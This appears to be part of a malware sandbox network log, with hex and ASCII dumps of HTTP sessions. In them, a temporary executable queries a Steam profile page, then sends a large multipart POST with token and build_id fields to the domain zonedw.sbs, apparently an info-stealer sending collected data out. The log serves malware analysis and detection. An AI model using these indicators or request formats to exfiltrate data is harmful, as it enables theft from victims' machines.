2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:02 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.7	50066	23.55.153.106	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:02 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-13 17:55:03 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 13 Dec 2024 17:55:03 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=d6d75f1a61d7535415328624; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-13 17:55:03 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-13 17:55:03 UTC	10097	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-13 17:55:03 UTC	10555	IN	Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 Data Ascii: ;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":&qu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	50068	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:05 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----T0R1DB1NYCBIMYUKF3WB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 54 30 52 31 44 42 31 4e 59 43 42 49 4d 59 55 4b 46 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 54 30 52 31 44 42 31 4e 59 43 42 49 4d 59 55 4b 46 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 30 52 31 44 42 31 4e 59 43 42 49 4d 59 55 4b 46 33 57 42 0d 0a 43 6f 6e 74 Data Ascii: ------T0R1DB1NYCBIMYUKF3WBContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------T0R1DB1NYCBIMYUKF3WBContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------T0R1DB1NYCBIMYUKF3WBCont
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
